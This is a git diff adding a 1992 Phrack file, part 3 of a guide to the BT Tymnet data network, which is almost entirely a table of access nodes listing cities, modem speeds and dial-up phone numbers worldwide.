+11. SummerCon 1992 by Knight Lightning and Dispater                        35K
+12. PWN/Part 1 by Datastream Cowboy                                        50K
+13. PWN/Part 2 by Datastream Cowboy                                        48K
+14. PWN/Part 3 by Datastream Cowboy                                        48K
+                                                                   Total: 702K
+
+      "Phrack.  The magazine the PHONE COMPANY doesn't want you to read!"
diff --git a/phrack40/10.txt b/phrack40/10.txt
new file mode 100644
index 0000000..cef792e
--- /dev/null
+++ b/phrack40/10.txt
@@ -0,0 +1,1349 @@
+                                ==Phrack Inc.==
+
+                    Volume Four, Issue Forty, File 10 of 14
+
+                       _________________________________
+                     ||                                 ||
+                     ||            BT Tymnet            ||
+                     ||         British Telecom         ||
+                     ||                                 ||
+                     ||           Part 3 of 3           ||
+                     ||                                 ||
+                     ||    Presented by Toucan Jones    ||
+                     ||                                 ||
+                     ||          August 1, 1992         ||
+                     ||_________________________________||
+
+
+                         Welcome Back to Tymnet Again!
+
+
+PART 1
+ A. BT Tymnet Access Location Index
+ B. BT-GNS Access Within Regional Bell Operating Companies
+  1. Bell Atlantic
+  2. BellSouth
+  3. Pacific Bell
+  4. Southwestern Bell
+  5. Southern New England Telephone
+ C. Database or Timesharing Companies on Tymnet
+ D. Service Classifications For Database or Timesharing Companies Using Tymnet
+ E. Summary of Global Network Services By Country
+ F. Terminal Identifiers
+ G. Login Options
+
+PART 2
+ H. BT-GNS Worldwide Asynchronus Outdial Service
+
+PART 3
+ I. BT-GNS Worldwide Access Sorted By Node
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ I. BT-GNS Worldwide Access Sorted By Node
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                                         DIALUP ACCESS            M
+                          PROV             100'S BPS              N
+NODE  CITY                 ST CNTRY DENS  3 12 24 96 ACCESS NO.   P COMMENTS
+----- -------------------- -- ----- ----  ---------- ------------ - --------
+      Porto Alegre             BRA  BGC     C        (011) 15331  N BGC Access
+      Porto Alegro             BRA  BGC   C          (011) 15311  N BGC Access
+      Cartago                  CRI  BGC   C C        51-2000      N BGC Access
+      C. Quesada               CRI  BGC   C C        46-2000      N BGC Access
+      Heredia                  CRI  BGC   C C        38-2000      N BGC Access
+      Kuwait City              KUW  BGC   C          143          N BGC Access
+      Rio                      BRA  BGC     C        (021)2538153 N BGC Access
+      Cairo                    EGY  BGC   C          (2)3907102   N BGC Access
+      Sao Paolo                BRA  BGC   C          (011) 1531   N BGC Access
+      Antofaganta              CHI  BGC   C C        (083)251634  Y BGC Access
+      Iguigue                  CHI  BGC   C C        (051)27907   Y BGC Access
+      La Serena                CHI  BGC   C C        (051)215751  Y BGC Access
+      Punta Arenas             CHI  BGC   C C        (061)28018   Y BGC Access
+      Santiago                 CHI  BGC   C C        (02)6987788  Y BGC Access
+      Talca                    CHI  BGC   C C        (041)234814  Y BGC Access
+      Temuco                   CHI  BGC   C C        (045)231476  Y BGC Access
+      Valdivia                 CHI  BGC   C C        (061)28018   Y BGC Access
+      Valparaiso               CHI  BGC   C C        (032)258052  Y BGC Access
+      Beijing                  CNA  BGC     C        3014443      N BGC Access
+      Alajvela                 CRI  BGC   C C        41-2000      N BGC Access
+      Liberia                  CRI  BGC   C C        66-2000      N BGC Access
+      Cairo                    EGY  BGC     C        (2) 390-9111 N BGC Access
+      Orste                    CRI  BGC   C C        20-2000      N BGC Access
+      Limon                    CRI  BGC   C C        58-2000      N BGC Access
+      Puntapbnas               CRI  BGC   C C        61-2000      N BGC Access
+      San Jose                 CRI  BGC   C C        57-2000      N BGC Access
+      S.Isidro                 CRI  BGC   C C        71-2000      N BGC Access
+      Cairo                    EGY  BGC     C        (2) 390-7203 N BGC Access
+      Bombay                   IND  BGC     C        (22) 275-916 N BGC Access
+      Bombay                   IND  BGC        C     (22) 275-847 N BGC Access
+      Adak                 AK  USA  ALAS  B B  C     907/592-2557 N
+      Anchorage            AK  USA  ALAS       C     907/258-6607 Y
+      Anchorage            AK  USA  ALAS  B B        907/258-7222 N
+      Barrow               AK  USA  ALAS  B B        907/852-2425 N Stat Mux
+      Bethel               AK  USA  ALAS  B B        907/543-2411 N Stat Mux
+      Cantwell             AK  USA  ALAS  B B  C     907/768-2700 N
+      Cordova              AK  USA  ALAS  B B        907/424-3744 N
+      Craig                AK  USA  ALAS  B B  C     907/826-2948 N
+      Dead horse           AK  USA  ALAS  B B        907/659-2777 N
+      Delta Junction       AK  USA  ALAS  B B        907/895-5070 N
+      Dillingham           AK  USA  ALAS  B B        907/842-2688 N Stat Mux
+      Dutch Harbor         AK  USA  ALAS  B B  C     907/581-1820 N
+      Fairbanks            AK  USA  ALAS       C     907/452-5848 Y
+      Fairbanks            AK  USA  ALAS  B B        907/456-3282 N
+      Glennallen           AK  USA  ALAS  B B        907/822-5231 N
+      Haines               AK  USA  ALAS  B          907/766-2171 N
+      Healy                AK  USA  ALAS  B B  C     907/683-1350 N
+      Homer                AK  USA  ALAS  B B        907/235-5239 N
+      Juneau               AK  USA  ALAS       C     907/789-1976 Y
+      Juneau               AK  USA  ALAS  B B        907/789-7009 N
+      Kenai                AK  USA  ALAS  B B        907/262-1990 N
+      Ketchikan            AK  USA  ALAS  B B        907/225-1871 N Stat Mux
+      King Salmon          AK  USA  ALAS  B B        907/246-3049 N
+      Kodiak               AK  USA  ALAS  B B        907/486-4061 N Stat Mux
+      Kotzebue             AK  USA  ALAS  B B        907/442-2602 N
+      Mcgrath              AK  USA  ALAS  B B        907/524-3256 N Stat Mux
+      Menana               AK  USA  ALAS  B          907/832-5214 N
+      Nome                 AK  USA  ALAS  B B        907/443-2256 N Stat Mux
+      Northway             AK  USA  ALAS  B B        907/778-2301 N Stat Mux
+      Palmer/Wasilla       AK  USA  ALAS  B B        907/745-0200 N
+      Petersburg           AK  USA  ALAS  B          907/772-3878 N
+      Prudhoe Bay          AK  USA  ALAS  B B        907/659-2777 N
+      Seward               AK  USA  ALAS  B B        907/224-3126 N Stat Mux
+      Sitka                AK  USA  ALAS  B B        907/747-5887 N Stat Mux
+      Skagway              AK  USA  ALAS  B          907/983-2170 N
+      Soldotna/Kenai       AK  USA  ALAS  B B        907/262-1990 N
+      St. Paul             AK  USA  ALAS  B B        907/546-2320 N Stat Mux
+      Tanana               AK  USA  ALAS  B B        907/366-7167 N Stat Mux
+      Tok                  AK  USA  ALAS  B          907/883-4747 N
+      Unalaska/Dutch Hbr.  AK  USA  ALAS  B B  C     907/581-1820 N
+      Valdez               AK  USA  ALAS  B B        907/835-4987 N Stat Mux
+      Wasilla              AK  USA  ALAS  B B        907/745-0200 N
+      Whittier             AK  USA  ALAS  B B        907/472-2467 N Stat Mux
+      Wrangell             AK  USA  ALAS  B          907/874-2394 N
+      Yakutat              AK  USA  ALAS  B B        907/784-3453 N Stat Mux
+      Kuwait City              KUW  BGC     C        142          N BGC Access
+      Kuwait City              KUW  BGC        C     141          N BGC Access
+      Kuala Lumpur             MAL  BGC   C          (30) 2328800 N BGC Access
+      Kuala Lumpur             MAL  BGC     C        (30) 2328855 N BGC Access
+      Penang                   MAL  BGC   C          (04) 375588  N BGC Access
+      Penang                   MAL  BGC     C        (04) 360088  N BGC Access
+      Kota Kinabalu            MAL  BGC   C          (088) 218800 N BGC Access
+      Kota Kinabalu            MAL  BGC     C        (088) 218855 N BGC Access
+      Petaling                 MAL  BGC   C C        (03) 7926600 N BGC Access
+      Ipoh                     MAL  BGC   C          (05) 548533  N BGC Access
+      Abu Dhabi                UAE  BGC        C     (4) 400-2763 N BGC Access
+      Surabaya                 IND  BGC   C          21242        N BGC Access
+      Jakarta                  IND  BGC   C          3805476      N BGC Access
+      Abu Dhabi                UAE  BGC           C  (4) 4002764  N BGC Access
+      Izmir                    TUR  BGC     C        145-20       N BGC Access
+      Abu Dhabi                UAE  BGC   C          (4) 400-2760 N BGC Access
+      Jakarta                  IND  BGC     C        3805445      N BGC Access
+      Jakarta                  IND  BGC   C          3805477      N BGC Access
+      Bandung                  IND  BGC   C          57441        N BGC Access
+      Abidjan                  IVC  BGC   C C        612211       N BGC Access
+      Lisbon                   POR  BGC        C     (06) 7174    N BGC Access
+      Kuantan                  MAL  BGC   C          (09) 508800  N BGC Access
+      Istanbul                 TUR  BGC     C        511 4083     N BGC Access
+      Coimbra                  POR  BGC     C        (03) 7173    N BGC Access
+      Khon Kaen                THA  BGC     C        (2) 245-581  N BGC Access
+      Abu Dhabi                UAE  BGC     C        (4) 400-2761 N BGC Access
+      Abidjan                  IVC  BGC        C     612210       N BGC Access
+      Coimbra                  POR  BGC   C          (03) 7172    N BGC Access
+      Bangkok                  THA  BGC   C          (2) 233-9905 N BGC Access
+      Jakarta                  IND  BGC     C        370208       N BGC Access
+      Jakarta                  IND  BGC     C        370195       N BGC Access
+      Medan                    IND  BGC   C          510977       N BGC Access
+      Semarang                 IND  BGC   C C        20008        N BGC Access
+      Porto                    POR  BGC        C     (05) 7173    N BGC Access
+      Porto                    POR  BGC   C          (05) 7172    N BGC Access
+      Porto                    POR  BGC     C        (05) 7173    N BGC Access
+      Medan                    IND  BGC   C          511977       N BGC Access
+      Medan                    IND  BGC     C        512977       N BGC Access
+      Medan                    IND  BGC     C        513977       N BGC Access
+      Ipoh                     MAL  BGC     C        (05) 548444  N BGC Access
+      Lisbon                   POR  BGC   C          (06) 7172    N BGC Access
+      Pattaya                  THA  BGC     C        (2) 425-313  N BGC Access
+      Coimbra                  POR  BGC        C     (03) 7173    N BGC Access
+      Ankara                   TUR  BGC     C        310 4805     N BGC Access
+      Lisbon                   POR  BGC     C        (06) 7173    N BGC Access
+      St. Thomas               VIR  3       B        809/776-7084 N TYMUSA
+      St. Thomas               VIR  3     B          809/774-7099 N TYMUSA
+      Bangkok                  THA  BGC     C        (2) 233-2312 N BGC Access
+      Rio                      BRA  BGC   C          (021)2538151 N BGC Access
+      San Pedro                CRI  BGC   C C        53-2000      N BGC Access
+      Chiengmai                THA  BGC     C        (2) 248-719  N BGC Access
+      Athens                   GRC  BGC   C          (1) 884-8428 N BGC Access
+      Kuantan                  MAL  BGC     C        (09) 508855  N BGC Access
+      Reykjavik                ICE  BGC        C     006          N BGC Access
+      Hong Kong                HKG  PAC        C     05-877-2553  N BISYNC
+1663  Annapolis            MD  USA  LOW   B B  C     410/224-0520 Y
+02026 Marshalltown         IA  USA  LOW   B B  C     515/753-0670 Y
+02027 Milan                    ITA  E2    B C  C     (2)66983004  N
+02040 Geneva                   CHE  E1    C C  C     (22)782-9329 Y
+02045 Albany               NY  USA  MED   B B  C     518/458-9724 Y
+02045 Schenectady/Albany   NY  USA  MED   B B  C     518/458-9724 Y
+02050 Casper               WY  USA  LOW   B B  C     307/234-4211 Y
+02051 Cincinnati           OH  USA  HIGH          C  513/489-2435 N TYM-X25
+02051 Cincinnati           OH  USA  HIGH       C     513/489-2664 N TYM-X25
+02057 Sevierville          TN  USA  LOW   B B  C     615/453-0401 Y
+02066 Indianapolis         IN  USA  HIGH  B B        317/631-1002 N
+02071 Las Cruces           NM  USA  LOW   B B  C     505/525-3401 Y
+02074 Eugene               OR  USA  LOW   B B  C     503/343-0044 Y
+02076 Oakland              CA  USA  HIGH          C  510/635-1662 N TYM-X25
+02076 Alameda/Oakland      CA  USA  HIGH          C  510/635-1662 N TYM-X25
+02076 Berkeley/Oakland     CA  USA  HIGH          C  510/635-1662 N TYM-X25
+02076 Hayward/Oakland      CA  USA  HIGH          C  510/635-1662 N TYM-X25
+02124 Yakima               WA  USA  LOW   B B  C     509/248-1462 Y
+02145 Norristown           PA  USA  MED           C  215/666-1984 N
+02155 Bloomington          IN  USA  LOW   B B  C     812/332-0544 Y
+02156 Dallas               TX  USA  HIGH  B B  C     214/630-5516 Y
+02163 Cheyenne             WY  USA  LOW   B B  C     307/638-0403 Y
+02235 Seattle              WA  USA  HIGH  B B  C     206/281-7141 Y
+02235 Bellevue/Seattle     WA  USA  HIGH  B B  C     206/281-7141 Y
+02246 Birmingham           AL  USA  HIGH  B B        205/942-4141 N
+02253 Boston               MA  USA  HIGH          C  617/439-7628 N TYM-X25
+02253 Cambridge/Boston     MA  USA  HIGH          C  617/439-7628 N TYM-X25
+02256 Elgin                IL  USA  LOW   B B  C     708/888-8113 Y
+02261 Burlington           VT  USA  LOW   B B  C     802/862-1000 Y
+02265 Albuquerque          NM  USA  MED   B B  C     505/242-8931 Y
+02301 Eau Claire           WI  USA  LOW   B B  C     715/833-0121 Y
+02304 New York             NY  USA  HIGH          C  212/269-4640 Y
+02326 Ormond Beach         FL  USA  LOW   B B  C     904/673-0034 Y
+02331 Seattle              WA  USA  HIGH  B B  C     206/281-7141 Y
+02331 Bellevue/Seattle     WA  USA  HIGH  B B  C     206/281-7141 Y
+02340 Newark               NJ  USA  HIGH          C  201/824-4201 Y
+02340 Elizabeth/Newark     NJ  USA  HIGH          C  201/824-4201 Y
+02340 Jersey City/Newark   NJ  USA  HIGH          C  201/824-4201 Y
+02340 Union/Newark         NJ  USA  HIGH          C  201/824-4201 Y
+02344 Knoxville            TN  USA  MED   B B  C     615/694-0156 Y
+02346 Norristown           PA  USA  WATS  B B  C     800/###-#### Y
+02347 Grand Junction       CO  USA  LOW   B B  C     303/241-1643 Y
+02354 Baltimore            MD  USA  HIGH  B B        410/547-8100 N
+02357 Bloomfield           CT  USA  HIGH  B B        203/242-7140 N
+02357 Hartford/Bloomfield  CT  USA  HIGH  B B        203/242-7140 N
+02364 Mesa/Phoenix         AZ  USA  HIGH  B B        602/254-5811 N
+02364 Phoenix              AZ  USA  HIGH  B B        602/254-5811 N
+02367 Champaign/Urbana     IL  USA  LOW   B B  C     217/344-3400 Y
+02367 Urbana               IL  USA  LOW   B B  C     217/344-3400 Y
+02376 Lima                 OH  USA  LOW   B B  C     419/228-6343 Y
+02377 Minneapolis          MN  USA  HIGH          C  612/338-0845 Y
+02377 St. Paul/Minneapolis MN  USA  HIGH          C  612/338-0845 Y
+02402 Hattiesburg          MS  USA  LOW   B B  C     601/582-0286 Y
+02413 Birmingham               GBR  E1    C C  C     (21632)6636  Y
+02414 Aurora/Denver        CO  USA  HIGH  B B        303/830-9210 N
+02414 Boulder/Denver       CO  USA  HIGH  B B        303/830-9210 N
+02414 Denver               CO  USA  HIGH  B B        303/830-9210 N
+02423 All Cities               CAY  3     B B        809/949-7100 N TYMUSA
+02432 Chattanooga          TN  USA  MED   B B  C     615/265-1020 Y
+02435 Williamsburg         VA  USA  LOW   B B  C     804/229-6786 Y
+02440 Brookfield           WI  USA  HIGH  B B        414/785-1614 N
+02440 Milwaukee/Brookfield WI  USA  HIGH  B B        414/785-1614 N
+02443 Burbank              CA  USA  LOW   B B  C     818/841-4795 Y
+02443 Glendale/Burbank     CA  USA  LOW   B B  C     818/841-4795 Y
+02446 Texarkana            TX  USA  LOW   B B  C     903/792-4521 Y
+02450 KingofPrussa/Norstwn PA  USA  MED   B B  C     215/666-9190 Y
+02450 Valley Forge/Norstwn PA  USA  MED   B B  C     215/666-9190 Y
+02453 Dallas               TX  USA  HIGH  B B        214/638-8888 N
+02465 Downrs Grove/Gln Eln IL  USA  MED   B B        708/790-4400 N
+02465 Glen Ellyn           IL  USA  MED   B B        708/790-4400 N
+02465 Wheaton/Glen Ellyn   IL  USA  MED   B B        708/790-4400 N
+02472 Paris                    FRA  E1    C C  C     (1)47728080  Y
+02475 White Plains         NY  USA  HIGH  B B  C     914/761-9590 Y
+02477 Alkmaar                  NLD  E1    C C  C  C  (72) 155190  Y
+02503 Bellevue/Seattle     WA  USA  HIGH  B B        206/285-0109 N
+02503 Seattle              WA  USA  HIGH  B B        206/285-0109 N
+02517 Nashville            TN  USA  HIGH  B B  C     615/889-5790 Y
+02521 Jacksonville         FL  USA  MED           C  904/724-5994 Y
+02544 Washington/Fairfax   DC  USA  HIGH  B B        703/691-8200 N
+02544 Bethesda/Fairfax     MD  USA  HIGH  B B        703/691-8200 N
+02544 Alexandria/Fairfax   VA  USA  HIGH  B B        703/691-8200 N
+02544 Arlington/Fairfax    VA  USA  HIGH  B B        703/691-8200 N
+02544 Fairfax              VA  USA  HIGH  B B        703/691-8200 N
+02545 Washington/Fairfax   DC  USA  HIGH  B B        703/691-8200 N
+02545 Bethesda/Fairfax     MD  USA  HIGH  B B        703/691-8200 N
+02545 Alexandria/Fairfax   VA  USA  HIGH  B B        703/691-8200 N
+02545 Arlington/Fairfax    VA  USA  HIGH  B B        703/691-8200 N
+02545 Fairfax              VA  USA  HIGH  B B        703/691-8200 N
+02557 Tyler                TX  USA  LOW   B B  C     903/581-8652 Y
+02560 Neuchatel                CHE  E1    C C  C     (38) 338606  Y
+02565 Boise                ID  USA  MED   B B        208/343-0404 N
+02566 Pierre               SD  USA  LOW   B B  C     605/224-7700 Y
+02570 Dayton               OH  USA  MED   B B        513/898-0124 N
+02571 Aurora/Denver        CO  USA  HIGH          C  303/830-9032 N TYM-X25
+02571 Boulder/Denver       CO  USA  HIGH          C  303/830-9032 N TYM-X25
+02606 Elizabeth/Newark     NJ  USA  HIGH  B B        201/824-1212 N
+02606 Jersey City/Newark   NJ  USA  HIGH  B B        201/824-1212 N
+02606 Newark               NJ  USA  HIGH  B B        201/824-1212 N
+02606 Union/Newark         NJ  USA  HIGH  B B        201/824-1212 N
+02610 Fairfield            CA  USA  LOW   B B  C     707/421-0106 Y
+02613 Chapel Hill/Durham   NC  USA  HIGH  B B        919/549-8952 N
+02613 Durham               NC  USA  HIGH  B B        919/549-8952 N
+02614 Lancaster            CA  USA  LOW   B B  C     805/945-4962 Y
+02616 Manchester           MA  USA  LOW   B B  C     508/526-1506 Y
+02630 Sherman              TX  USA  LOW   B B  C     903/868-0089 Y
+02631 Anaheim/Newprt Beach CA  USA  HIGH  B B        714/756-8341 N
+02631 Irvine/Newport Beach CA  USA  HIGH  B B        714/756-8341 N
+02631 Newport Beach        CA  USA  HIGH  B B        714/756-8341 N
+02631 Santa Ana/Newprt Bch CA  USA  HIGH  B B        714/756-8341 N
+02635 Richland             WA  USA  MED   B B  C     509/375-3367 Y
+02640 Peterborough         NH  USA  LOW   B B  C     603/924-7090 Y
+02644 Anaheim/Newprt Beach CA  USA  HIGH          C  714/752-1493 Y
+02644 Irvine/Newport Beach CA  USA  HIGH          C  714/752-1493 Y
+02644 Newport Beach        CA  USA  HIGH          C  714/752-1493 Y
+02644 Santa Ana/Newprt Bch CA  USA  HIGH          C  714/752-1493 Y
+02653 Stamford             CT  USA  HIGH  B B        203/965-0000 N
+02655 Colton               CA  USA  MED   B B        714/370-1200 N
+02655 Riverside/Colton     CA  USA  MED   B B        714/370-1200 N
+02655 San Bernadino/Colton CA  USA  MED   B B        714/370-1200 N
+02657 Pawtucket/Providence RI  USA  HIGH          C  401/751-8030 Y
+02657 Pawtucket/Providence RI  USA  HIGH  B B  C     401/273-0200 Y
+02657 Providence           RI  USA  HIGH          C  401/751-8030 Y
+02657 Providence           RI  USA  HIGH  B B  C     401/273-0200 Y
+02657 Warwick/Providence   RI  USA  HIGH          C  401/751-8030 Y
+02657 Warwick/Providence   RI  USA  HIGH  B B  C     401/273-0200 Y
+02665 San Diego            CA  USA  HIGH  B B  C     619/296-8747 Y
+02666 Jackson              MI  USA  LOW   B B  C     517/788-9191 Y
+02674 Tupelo               MS  USA  LOW   B B  C     601/841-0090 Y
+02703 St. Laurent          QU  CAN  CANH  C C  C     514/747-2996 Y
+02703 Montreal/St. Laurent QU  CAN  CANH  C C  C     514/747-2996 Y
+02704 San Francisco        CA  USA  WATS  B B  C     800/###-#### Y
+02704 San Jose             CA  USA  WATS  B B  C     800/###-#### Y
+02711 Kingsport            TN  USA  LOW   B B  C     615/378-5746 Y
+02712 Houston              TX  USA  HIGH  B B  C     713/496-1332 Y
+02720 La Crosse            WI  USA  LOW   B B  C     608/784-9099 Y
+02723 Baton Rouge          LA  USA  MED   B B        504/924-5102 N
+02737 Salt Lake City       UT  USA  HIGH  B B        801/364-0780 N
+02743 Jackson              MS  USA  LOW   B B  C     601/355-9741 Y
+02752 Stamford             CT  USA  HIGH          C  203/324-2297 Y
+02753 San Antonio          TX  USA  HIGH  B B        512/225-8002 N
+02770 Tucson               AZ  USA  MED   B B  C     602/297-2239 Y
+02771 Wheeling             WV  USA  LOW   B B  C     304/233-7676 Y
+03001 Dallas               TX  USA  HIGH  B B        214/638-8888 N
+03031 Aurora               IL  USA  LOW   B B        708/844-0700 N
+03031 St. Charles/Aurora   IL  USA  LOW   B B        708/844-0700 N
+03035 San Francisco        CA  USA  WATS  B B  C     800/###-#### Y
+03611 Nashville            TN  USA  HIGH          C  615/889-4044 Y
+03611 Nashville            TN  USA  HIGH  B B  C     615/889-5790 Y
+03614 Mankato              MN  USA  LOW   B B  C     507/387-7313 Y
+03623 Erie                 PA  USA  LOW   B B  C     814/456-8501 Y
+03624 Raleigh              NC  USA  LOW   B B  C     919/829-0536 Y
+03627 Belfast                  GBR  E1         C     (232) 234467 Y
+03630 Idaho Falls          ID  USA  LOW   B B  C     208/522-3624 Y
+03635 Lafayette            LA  USA  LOW   B B  C     318/234-8255 Y
+03643 Harrisburg/Lemoyne   PA  USA  MED   B B        717/763-6481 N
+03643 Lemoyne              PA  USA  MED   B B        717/763-6481 N
+03650 Chicago              IL  USA  HIGH  B B  C     312/922-6571 Y
+03651 Green Bay            WI  USA  LOW   B B  C     414/432-3064 Y
+03652 Trenton              NJ  USA  LOW   B B  C     609/394-1900 Y
+03653 Ft. Wayne            IN  USA  LOW   B B  C     219/422-2581 Y
+03654 Southfield           MI  USA  MED   B B  C     313/424-8024 Y
+03656 Evansville           IN  USA  LOW   B B  C     812/464-8181 Y
+03661 Charleston           WV  USA  LOW   B B  C     304/345-9575 Y
+03662 Allentown/Bethlehem  PA  USA  MED   B B  C     215/865-6978 Y
+03662 Bethlehem            PA  USA  MED   B B  C     215/865-6978 Y
+03663 Mesa/Phoenix         AZ  USA  HIGH          C  602/258-4528 Y
+03663 Phoenix              AZ  USA  HIGH          C  602/258-4528 Y
+03664 Phoenix              AZ  USA  HIGH          C  602/257-0629 N TYM-X25
+03664 Phoenix              AZ  USA  HIGH       C     602/257-0736 N TYM-X25
+03666 Lansing              MI  USA  MED   B B        517/482-5721 N
+03673 Carson City          NV  USA  MED   B B  C     702/885-8411 Y
+03673 Reno/Carson City     NV  USA  MED   B B  C     702/885-8411 Y
+03675 Worcester            MA  USA  LOW   B B  C     508/791-9000 Y
+03677 Joplin               MO  USA  LOW   B B  C     417/781-8718 Y
+03704 Niagara Falls        NY  USA  LOW   B B  C     716/285-2561 Y
+03705 Albany               NY  USA  MED   B B        518/458-8300 N
+03705 Schenectady/Albany   NY  USA  MED   B B        518/458-8300 N
+03706 San Francisco        CA  USA  HIGH  B B        415/974-1300 N
+03707 Philadelphia         PA  USA  HIGH          C  215/629-0567 Y
+03712 Ottomwa              IA  USA  LOW   B B  C     515/682-0857 Y
+03720 Winston-Salem        NC  USA  MED   B B  C     919/765-1221 Y
+03725 Los Altos/San Jose   CA  USA  HIGH          C  408/432-0804 Y
+03725 San Jose             CA  USA  HIGH          C  408/432-0804 Y
+03725 Santa Clara/San Jose CA  USA  HIGH          C  408/432-0804 Y
+03725 Sunnyvale/San Jose   CA  USA  HIGH          C  408/432-0804 Y
+03726 Billings             MT  USA  LOW   B B  C     406/252-4880 Y
+03731 Shreveport           LA  USA  LOW   B B  C     318/688-5840 Y
+03733 Brussels                 BEL  E1    C C  C     (2) 725-5060 Y
+03733 Brussels                 BEL  E1         C     02-7255015   N HSA
+03737 Clearwater           FL  USA  MED           C  813/443-4515 Y
+03752 Rosemont             IL  USA  HIGH  B B  C     708/698-9800 Y
+03774 Port Angeles         WA  USA  LOW   B B  C     206/452-6800 Y
+03775 Newark               OH  USA  LOW   B B  C     614/345-8953 Y
+04000 Longwood/Orlando     FL  USA  MED   B B        407/841-0020 N
+04000 Orlando              FL  USA  MED   B B        407/841-0020 N
+04003 Agana Heights            GUM  *     C C        671/477-2222 N
+04003 Guatemala City           GTM  2       B        (2) 345-999  N TYMUSA
+04003 Guatemala City           GTM  2     B          (2) 345-599  N TYMUSA
+04003 All Cities               HND  2     B B        320-544      N TYMUSA
+04003 Afula                    ISR  3     B B  C     (6) 596658   N TYMUSA
+04003 Ashdod                   ISR  3     B B  C     (8) 542999   N TYMUSA
+04003 Bezeq                    ISR  3     B B  C     (57) 36029   N TYMUSA
+04003 Eilat                    ISR  3     B B  C     (59) 75147   N TYMUSA
+04003 Hadera                   ISR  3     B B  C     (6) 332409   N TYMUSA
+04003 Haifa                    ISR  3     B B  C     (4) 525421   N TYMUSA
+04003 Haifa                    ISR  3     B B  C     (4) 673235   N TYMUSA
+04003 Haifa                    ISR  3     B B  C     (4) 674203   N TYMUSA
+04003 Haifa                    ISR  3     B B  C     (4) 674230   N TYMUSA
+04003 Herzeliya                ISR  3     B B  C     (52) 545251  N TYMUSA
+04003 Jerusalem                ISR  3     B B  C     (2) 242675   N TYMUSA
+04003 Jerusalem                ISR  3     B B  C     (2) 246363   N TYMUSA
+04003 Jerusalem                ISR  3     B B  C     (2) 248551   N TYMUSA
+04003 Jerusalem                ISR  3     B B  C     (2) 814396   N TYMUSA
+04003 Nahariya                 ISR  3     B B  C     (4) 825393   N TYMUSA
+04003 Netanya                  ISR  3     B B  C     (53) 348588  N TYMUSA
+04003 Rechovot                 ISR  3     B B  C     (8) 469799   N TYMUSA
+04003 Tel Aviv                 ISR  3     B B  C     (3) 203435   N TYMUSA
+04003 Tel Aviv                 ISR  3     B B  C     (3) 546-3837 N TYMUSA
+04003 Tel Aviv                 ISR  3     B B  C     (3) 751-2504 N TYMUSA
+04003 Tel Aviv                 ISR  3     B B  C     (3) 751-3799 N TYMUSA
+04003 Tel Aviv                 ISR  3     B B  C     (3)752-0110  N TYMUSA
+04003 Tiberias                 ISR  3     B B  C     (6) 790274   N TYMUSA
+04003 Tzfat                    ISR  3     B B  C     (6) 973282   N TYMUSA
+04003 All Cities               JAM  2     B B        809/924-9915 N TYMUSA
+04003 Curacao                  NDA  3     C C        (9) 239251   N TYMUSA
+04003 Curacao & St. Martin     NDA  3     C C        0251         N TYMUSA
+04003 All Cities               PAN  3          C     636-727      N TYMUSA
+04003 All Cities               PAN  3     B B        639-055      N TYMUSA
+04003 Manila                   PHL  2     B B        (2) 815-1553 N TYMUSA
+04003 Manila                   PHL  2     B B        (2) 815-1555 N TYMUSA
+04003 Manila                   PHL  2     B B        (2) 817-1581 N TYMUSA
+04003 Manila                   PHL  2     B B        (2) 817-1791 N TYMUSA
+04003 Manila                   PHL  2     B B        (2) 817-1796 N TYMUSA
+04003 Manila                   PHL  2     C          (2) 521-7901 N TYMUSA
+04003 Manila                   PHL  2     C          (2) 817-8811 N TYMUSA
+04003 Manila                   PHL  2     C          (2) 819-1009 N TYMUSA
+04003 Manila                   PHL  2     C          (2) 819-1011 N TYMUSA
+04003 Manila                   PHL  2     C          (2) 819-1550 N TYMUSA
+04003 Mayaquez/Ponce           PRI  *     B B        809/462-4213 N
+04003 San Juan                 PRI  *          C     809/724-6070 N
+04003 San Juan                 PRI  *     B B        809/725-1882 N
+04003 San Juan                 PRI  *     B B        809/725-4343 N
+04003 San Juan                 PRI  *     C C        809/725-3501 N
+04003 San Juan                 PRI  *     C C        809/725-4702 N
+04003 Alkobar                  SAU  5       C        (3) 8981025  N TYMUSA
+04003 Jeddah                   SAU  5          C     (2) 6691377  N TYMUSA
+04003 Jeddah                   SAU  5       C        (2) 6690708  N TYMUSA
+04003 Riyadh                   SAU  5          C     (1) 4631038  N TYMUSA
+04003 Riyadh                   SAU  5       C        (1) 4658803  N TYMUSA
+04003 All Cities               TTO  2     C C        809/627-0854 N TYMUSA
+04003 All Cities               TTO  2     C C        809/627-0855 N TYMUSA
+04003 Aberdeen                 GBR  1     C C  C     (224) 210701 Y TYMUSA
+04003 Birmingham               GBR  1     C C  C     (21)633-3474 Y TYMUSA
+04003 Bristol                  GBR  1     C C  C     (272) 211545 Y TYMUSA
+04003 Cambridge                GBR  1     C C  C     (223) 460127 Y TYMUSA
+04003 Cardiff                  GBR  1     C C  C     (222) 344184 Y TYMUSA
+04003 Chelmsford               GBR  1     C C  C     (245) 491323 Y TYMUSA
+04003 Edinburgh                GBR  1     C C  C     (31)313-2137 Y TYMUSA
+04003 Exeter                   GBR  1     C C  C     (392) 421565 Y TYMUSA
+04003 Glasgow                  GBR  1     C C  C     (41)204-1722 Y TYMUSA
+04003 Hastings                 GBR  1     C C  C     (424) 722788 Y TYMUSA
+04003 Ipswich                  GBR  1     C C  C     (473) 210212 Y TYMUSA
+04003 Kings Lynn               GBR  1     C C  C     (553) 691090 Y TYMUSA
+04003 Leamington               GBR  1     C C  C     (926) 451419 Y TYMUSA
+04003 Leeds                    GBR  1     C C  C     (532) 440024 Y TYMUSA
+04003 Liverpool                GBR  1     C C  C     (51)255-0230 Y TYMUSA
+04003 London (Clerkenwell)     GBR  1     C C  C     (71)490-2200 Y TYMUSA
+04003 Luton                    GBR  1     C C  C     (582) 481818 Y TYMUSA
+04003 Manchester               GBR  1     C C  C     (61)834-5533 Y TYMUSA
+04003 Newcastle                GBR  1     C C  C     (91)261-6858 Y TYMUSA
+04003 Nottingham               GBR  1     C C  C     (???) 506005 Y TYMUSA
+04003 Oxford                   GBR  1     C C  C     (865) 798949 Y TYMUSA
+04003 Plymouth                 GBR  1     C C  C     (752) 603302 Y TYMUSA
+04003 Reading                  GBR  1     C C  C     (734) 500722 Y TYMUSA
+04003 Ayr                      GBR  1     C C  C     (292) 611822 Y TYMUSA
+04003 Belfast                  GBR  1     C C  C     (232) 331284 Y TYMUSA
+04003 Benbecula                GBR  1     C C  C     (870) 2657   Y TYMUSA
